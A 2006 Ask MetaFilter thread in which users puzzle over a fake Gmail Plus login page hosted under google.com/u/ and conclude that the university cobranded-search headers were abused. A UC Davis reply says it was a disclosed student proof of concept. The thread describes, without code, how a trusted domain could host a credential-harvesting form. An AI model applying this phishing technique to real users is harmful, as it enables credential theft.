Google exploit
September 15, 2006 3:52 AM   Subscribe

Can someone explain to me what this: http://www.google.com/u/gplus is all about? How is it done? Hint: you may not want to enter your real Google login details into the form.

This popped up on del.icio.us today. I'm trying to work out how someone scored a google.com/* address to run fake password-grabbing login page on. What's the trick?
posted by Jimbob to Computers & Internet (19 answers total) 2 users marked this as a favorite
 
Why do you say it's a fake?
posted by gleuschk at 4:21 AM on September 15, 2006


Well, because I doubt it's official Google corporate policy to set up a page claiming to be offering a "Limited Beta of Gmail Plus!" that sends you off to a remote domain that tells you the password you typed in.
posted by Jimbob at 4:23 AM on September 15, 2006


Ah, ok. I entered jimbob/wtf for the username/pwd, and got back
You (could have) gotten served!
jimbob = username you entered
wtf = password you entered
No data was actually taken, just displayed to you :) This is just a proof of concept of what a malicious user could do with this exploit.
The URL in the address bar is http://www.monthsbehind.net/google.php
posted by gleuschk at 4:26 AM on September 15, 2006


So to repeat JBs question, wtf is going on?
posted by wilful at 4:34 AM on September 15, 2006 [1 favorite]


That is really bizarre. It is not character spoofing because the trick still workes if one types the URL into the address bar. The monthsbehind.com root directory is not helpful at all. Is this a prank by an internal Google employee?
posted by pheideaux at 4:39 AM on September 15, 2006


Usually in situations like this, I blame the interns.
posted by jessamyn at 4:43 AM on September 15, 2006 [1 favorite]


You can see the same effect with other pages under the u directory like this: Electronic visualization lab. This page Cobranded University Search seems to shed some light on to it. It's their university offering.
posted by jessamyn at 4:46 AM on September 15, 2006


Right, ucdavis.edu is mentioned in the source of the dodgy page.
posted by edd at 4:50 AM on September 15, 2006


The google /u/ pages are custom search pages for various organizations, especially universities and schools:

Google's own example.

The schools have total control over the content of those pages, so they can easily perform a hack like the gmailplus one. I'm glad someone demonstrated this exploit.
posted by jedrek at 4:52 AM on September 15, 2006


More here, here here and description of other schools in the program here, though gplus is not on the list.
posted by jessamyn at 4:52 AM on September 15, 2006


I'm not sure exactly what's going on here, and I suspect Google will take it down shortly.

Basically: google.com/u contains various legit Google pages.
For example, try /blah, /test or /2. The /test one mentions cobranded university search. Perhaps a mischevious university employee has access to upload a page to /gplus?
posted by matthewr at 4:55 AM on September 15, 2006


Whoa, I need to refresh more often and use preview.
posted by matthewr at 4:55 AM on September 15, 2006


I sent an email to the guy who has the monthsbehind domain registered to let him know that the link to that page is now out in the wild. His info is easy to find on whois, so this was probably some sort of example page and not an intentional nefarious hack.
posted by jessamyn at 5:03 AM on September 15, 2006


I send an email to the guy who has the domain registered to let him know that the link to that page is now out in the wild.

Heh, I wanted answers not action..! I guess this was all a lot simpler than I thought...
posted by Jimbob at 5:04 AM on September 15, 2006


Here's a link to the guy who uncovered it as a potential phishing loophole.
posted by peacay at 5:07 AM on September 15, 2006


Ah ha, now I get it, thanks to Peacay.

Google offers a service for universities to "brand" Google search by specifying their own header and footer.

This makes it possible, if you get onto that service, to insert a "header" and "footer" that makes the page look like a Gmail login, giving you your own google.com URL with a password form that can send the data to whatever site you like.

And they would have got away with it, too, if it wasn't for us darned kids!
posted by Jimbob at 5:14 AM on September 15, 2006


Firefox 2 considers that link to be a phishing attempt.
posted by Coda at 5:56 PM on September 15, 2006


Yeah, I get a pop up warning me not to use the page at all. <3 Firefox.
posted by Salmonberry at 2:16 PM on September 16, 2006


I got an email back from the UC Davis people:

Dear Ms. West

We appreciate your concern and you taking the time to contact us.

One of our programming students, Eric Farraro, discovered a security issue
for Google, on their military and university local search engine software,
which actually creates a security risk to Google servers and not the
military/university site.

He ran a legitimate test site to prove his point, under the guidance of his
supervisor, Charlie Turner. When he had proof, he contacted Google, who
immediately took down the specific functionality while they fix the bug.
(It is still down). Eric's site did not actually do any "phishing" - it
strictly returned the information to the person originating the login, to
let them know that had it been a real phishing site, their information would
have been taken and used without their knowledge.

His discovery will certainly save millions from a potentially huge
"phishing" exploit, as any phishing done using this security breach would be
using google's name as a "www.google.com/u/[put whatever you want here] URL
- which of course would be considered a trusted source by many.

Therefore, rest assured that this site was created with both the knowledge
of his supervisor and now of Google - who is working to correct the security
breach that Eric discovered.

Once again, thank-you very much for your inquiry.

Sincerely

Liz Gibson
posted by jessamyn at 7:13 PM on September 17, 2006


« Older Why can't I get me some cheapy electronics in...   |   What career path should I choose? Newer »
This thread is closed to new comments.